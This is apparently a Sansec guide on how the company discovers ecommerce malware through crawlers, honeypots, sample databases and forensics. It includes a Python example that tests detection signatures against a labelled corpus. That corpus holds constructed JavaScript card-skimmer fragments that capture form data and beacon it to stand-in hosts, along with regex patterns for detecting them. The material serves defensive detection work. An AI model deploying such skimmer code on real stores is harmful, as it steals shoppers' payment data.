Discovering new threats
by Team Sansec
Published in Guides
We discover new attack vectors multiple times per day, sometimes as soon as criminals start using them. But how?
eComscan is solid software but in order to really shine, it requires a constant feed of new malware intelligence. And that's where our real magic lies: in the systematic discovery of new threats.
Signal processing
The heart of Sansec HQ is our threat signal processing unit. We collect suspicious activity from all over the world, sometimes over 200 indicators per day. Sansec security engineers process these signals around the clock. If a signal is deemed malicious, we write an experimental heuristic ("signature"), which is then tested against our ecommerce malware library, live ecommerce sites and honeypot stores. If the results hold up, the signature is promoted and distributed, and all customers immediately benefit from the improved detection capability.
This systematic approach leads to a 99%+ malware detection rate!
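The promotion step above is the part practitioners most often get wrong: a heuristic that catches every known skimmer is useless if it also fires on ordinary checkout form validation. The following added example (illustration only, not Sansec's pipeline or eComscan code) shows the shape of such a gate: a candidate signature is a set of patterns that must all match, it is run against a labelled corpus, and it is promoted only when it produces zero false positives on the clean set and reaches a minimum recall on the known-malicious set. The JavaScript fragments, the `.example`/`.test` hostnames, the `MALICIOUS`/`CLEAN` sets and the 0.6 recall threshold are all constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample corpus (not real malware): short JavaScript fragments that
# stand in for skimmer samples and for benign code that looks superficially
# similar. Hostnames use the reserved .example/.test TLDs.
MALICIOUS = {
    "skimmer-a": "document.querySelector('form').addEventListener('submit', function () {"
                 " var d = btoa(JSON.stringify({cc: document.getElementById('cc').value}));"
                 " new Image().src = 'https://stats.example/i.gif?d=' + d; });",
    "skimmer-b": "window.addEventListener('submit', function (e) {"
                 " var p = btoa(document.forms[0].innerHTML);"
                 " fetch('https://cdn-cache.test/c', {method: 'POST', body: p}); });",
    # Lightly obfuscated: the event name is pulled from a string array, so a
    # naive 'submit' hook pattern will miss it.
    "skimmer-c": "var _0x = ['submit', 'src'];"
                 " document.addEventListener(_0x[0], function () {"
                 " new Image()[_0x[1]] = 'https://img.example/?q=' + btoa(document.body.innerHTML); });",
}
CLEAN = {
    # Benign code that shares one feature each with the skimmers above.
    "validation": "form.addEventListener('submit', function (e) {"
                  " if (!validate(form)) { e.preventDefault(); } });",
    "analytics": "fetch('https://analytics.example/collect', {method: 'POST',"
                 " body: JSON.stringify({page: location.pathname})});",
    "svg-encode": "var encoded = 'data:image/svg+xml;base64,' + btoa(svgMarkup);",
}


@dataclass
class Signature:
    name: str
    require: list  # every regex must match for a sample to be flagged (AND)

    def matches(self, sample: str) -> bool:
        return all(re.search(p, sample, re.DOTALL) for p in self.require)


@dataclass
class Evaluation:
    tp: int = 0
    fn: int = 0
    fp: int = 0
    missed: list = field(default_factory=list)      # malicious samples not caught
    false_hits: list = field(default_factory=list)  # clean samples wrongly flagged

    @property
    def recall(self) -> float:
        total = self.tp + self.fn
        return self.tp / total if total else 0.0


def evaluate(sig: Signature, malicious: dict, clean: dict) -> Evaluation:
    """Run a candidate signature over both labelled sets and count outcomes."""
    ev = Evaluation()
    for name, code in malicious.items():
        if sig.matches(code):
            ev.tp += 1
        else:
            ev.fn += 1
            ev.missed.append(name)
    for name, code in clean.items():
        if sig.matches(code):
            ev.fp += 1
            ev.false_hits.append(name)
    return ev


def promote(sig: Signature, malicious=MALICIOUS, clean=CLEAN, min_recall=0.6):
    """Promotion gate (threshold is an assumption for this example):
    any false positive on the clean corpus rejects the signature outright,
    then it must still catch at least min_recall of the known samples.
    Returns (decision, evaluation)."""
    ev = evaluate(sig, malicious, clean)
    if ev.fp:
        return "rejected: false positives on " + ", ".join(ev.false_hits), ev
    if ev.recall < min_recall:
        return f"rejected: recall {ev.recall:.2f} below {min_recall}", ev
    return "promoted", ev


SUBMIT_HOOK = r"addEventListener\(\s*['\"]submit['\"]"
# A loose heuristic: any submit handler. Catches skimmers, but also validation code.
LOOSE = Signature("submit-hook", [SUBMIT_HOOK])
# A tighter one: submit hook AND base64 encoding AND an absolute URL (a beacon).
TIGHT = Signature("submit-hook+base64+beacon",
                  [SUBMIT_HOOK, r"\bbtoa\(", r"https?://[\w.-]+"])

if __name__ == "__main__":
    for sig in (LOOSE, TIGHT):
        decision, ev = promote(sig)
        print(f"{sig.name}: {decision} "
              f"(tp={ev.tp} fn={ev.fn} fp={ev.fp} missed={ev.missed})")
```

Running it, the loose signature is rejected because it flags the benign validation handler, while the tighter one is promoted even though it misses the obfuscated sample: the gate treats a false positive on a live store as worse than a miss, which is the trade-off the live-site and honeypot testing in the process above exists to enforce. The missed sample is exactly the kind of signal that feeds the next round of signature work.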
Threat signal channels
a. Global crawler
Our primary source of new intel is our global crawler, which visits the top 400K+ global ecommerce stores every couple of hours. Based on a long list of subtle indicators, we identify 20 to 100 hacked stores per day. Since 2015, we have identified over 100,000 compromised stores, which we analyze for new attack vectors. Where we can get hold of the store owner, we alert them.
b. Malware database
Our collection of ecommerce malware is possibly the largest in the world. Thanks to hundreds of partners and volunteers who submit samples to us, we are always on top of the latest developments.
c. Honeypots
Sansec has been buying ecommerce stores that went out of business. We scrub any personal data and then redeploy their web presence. The older the store, the more attacks it typically receives. When attackers break in, every step they take is recorded by our monitoring system, and we learn about the latest techniques.
d. Tracking threat actors
Much of our R&D time is spent studying threat actors. Sometimes we are even able to predict their next steps so we can prepare mitigation.
Most of the semi-public criminal activity happens on dark web forums and Telegram/Jabber channels, where new exploits are discussed or put up for sale. There is intense competition among fraud gangs, which often causes crucial information to leak.
e. Forensic cases
Sansec is the go-to authority on eCommerce security and we have been hired by more than 400 eCommerce companies to run a forensic investigation. Because of our specialization, we can usually complete a root cause analysis within hours, whereas generic security vendors require days or weeks.
Our security software is also used by other forensic investigators, who may escalate their hard cases to us. These are great opportunities for us to improve our detection patterns.
Conclusion
The profitability of digital skimming creates an ongoing struggle between merchants and cyber criminals. We are extremely motivated to be always one step ahead!